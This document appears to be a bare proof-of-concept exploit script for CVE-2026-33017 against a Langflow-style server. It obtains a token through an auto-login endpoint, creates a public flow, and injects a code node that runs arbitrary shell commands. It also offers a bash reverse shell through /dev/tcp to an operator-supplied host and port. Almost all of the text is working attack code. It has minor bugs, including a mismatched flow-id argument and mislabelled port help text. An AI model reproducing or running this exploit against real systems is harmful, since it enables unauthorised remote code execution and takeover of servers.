README.md
Rendering markdown...
import requests
import argparse
import sys
def create_flow(host, port, timeout=5):
if not host.startswith(("http://", "https://")):
base_url = f"http://{host}:{port}"
else:
base_url = f"{host}:{port}"
session = requests.Session()
print("[*] Fetching access token...")
login_res = session.get(f"{base_url}/api/v1/auto_login", timeout=timeout)
if not login_res.ok:
print(f"[!] Failed to login. Server returned: {login_res.text}")
login_res.raise_for_status()
token = login_res.json().get("access_token")
session.headers.update({
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
})
print("[*] Creating a new public flow...")
flow_payload = {
"name": "test",
"data": {"nodes": [], "edges": []},
"access_type": "PUBLIC"
}
flow_res = session.post(f"{base_url}/api/v1/flows/", json=flow_payload, timeout=timeout)
if not flow_res.ok:
print(f"[!] Failed to create flow. Server returned: {flow_res.text}")
flow_res.raise_for_status()
flow_id = flow_res.json().get("id")
print(f"[+] Public Flow ID created: {flow_id}")
return flow_id
def run_reverse_shell(host, port, lhost, lport, flow_id, timeout=5):
print(f"[*] Sending reverse shell to connect back to {lhost}:{lport}")
command = f"import os, socket, json as _json\n\n_command = os.system(\"bash -c 'bash >& /dev/tcp/{lhost}/{lport} 0>&1'\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n display_name=\"X\"\n outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n def r(self)->Data:\n return Data(data={{}})"
success = exploit(host, port, flow_id, command, timeout)
if success:
print("[+] Reverse shell command sent. Check your listener.")
else:
print("[!] Failed to send reverse shell command.")
return success
def exploit(host, port, flow_id, command, timeout=5):
if not host.startswith(("http://", "https://")):
base_url = f"http://{host}:{port}"
else:
base_url = f"{host}:{port}"
session = requests.Session()
try:
build_url = f"{base_url}/api/v1/build_public_tmp/{flow_id}/flow"
exploit_payload = {
"data": {
"nodes": [{
"id": "Test",
"type": "genericNode",
"position": {"x": 0, "y": 0},
"data": {
"id": "Test",
"type": "Test",
"node": {
"template": {
"code": {
"type": "code",
"required": True,
"show": True,
"multiline": True,
"value": f"{command}",
"name": "code",
"password": False,
"advanced": False,
"dynamic": False
},
"_type": "Component"
},
"description": "X",
"base_classes": ["Data"],
"display_name": "Test",
"name": "Test",
"frozen": False,
"outputs": [{
"types": ["Data"],
"selected": "Data",
"name": "o",
"display_name": "O",
"method": "r",
"value": "__UNDEFINED__",
"cache": True,
"allows_loop": False,
"tool_mode": False,
"hidden": None,
"required_inputs": None,
"group_outputs": False
}],
"field_order": ["code"],
"beta": False,
"edited": False
}
}
}],
"edges": []
},
"inputs": None
}
response = session.post(build_url, json=exploit_payload, cookies={"client_id": "test"}, timeout=timeout)
print(f"[*] Status Code: {response.status_code}")
print("[*] Response Body:")
print(response.text)
return True
except Exception as e:
print(f"[!] An unexpected error occurred: {e}")
return False
def main():
parser = argparse.ArgumentParser(description="PoC for CVE-2026-33017")
parser.add_argument("host", nargs="?", help="Target IP or hostname (ignored if -u is used)")
parser.add_argument("-p", "--port", type=int, default=7860, help="SSH port (default: 22)")
parser.add_argument("-id", "--flow_id", help="Public Flow ID (a new one will be created if omitted)")
parser.add_argument("--command","-c", help="Custom command to run on target")
parser.add_argument("--shell", action="store_true", help="Launch a Bash-based reverse shell")
parser.add_argument("--lhost", help="Your IP for reverse shell")
parser.add_argument("--lport", type=int, default=4444, help="Your port for reverse shell (default: 4444)")
parser.add_argument("-t", "--timeout", type=int, default=5, help="Connection timeout (default: 5s)")
args = parser.parse_args()
results = []
def process_host(host):
port = args.port
output_lines = []
timeout = args.timeout
print(f"[*] Target: {host}:{port}")
if not args.shell and not args.command:
msg = f"[-] No action specified for {host}:{port}. Use --shell or --command."
print(msg)
output_lines.append(msg)
return 1, output_lines
if args.shell and not args.lhost:
msg = f"[-] --lhost is required for reverse shell. Skipping {host}:{port}."
print(msg)
output_lines.append(msg)
return 1, output_lines
if args.flow_id:
flow_id = args.id
else:
flow_id = create_flow(host, port, timeout)
if args.shell:
success = run_reverse_shell(host, port, args.lhost, args.lport, flow_id, timeout)
return (0 if success else 1), output_lines
if args.command:
command = f"import os, socket, json as _json\n\n_command = os.system(\"{args.command}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n display_name=\"X\"\n outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n def r(self)->Data:\n return Data(data={{}})"
success = exploit(host, port, flow_id, command)
return (0 if success else 1), output_lines
exit_code = 0
if not args.host:
print("[-] No host specified.")
return 1
code, output_lines = process_host(args.host)
results.extend(output_lines)
if code != 0:
exit_code = code
return exit_code
if __name__ == "__main__":
sys.exit(main())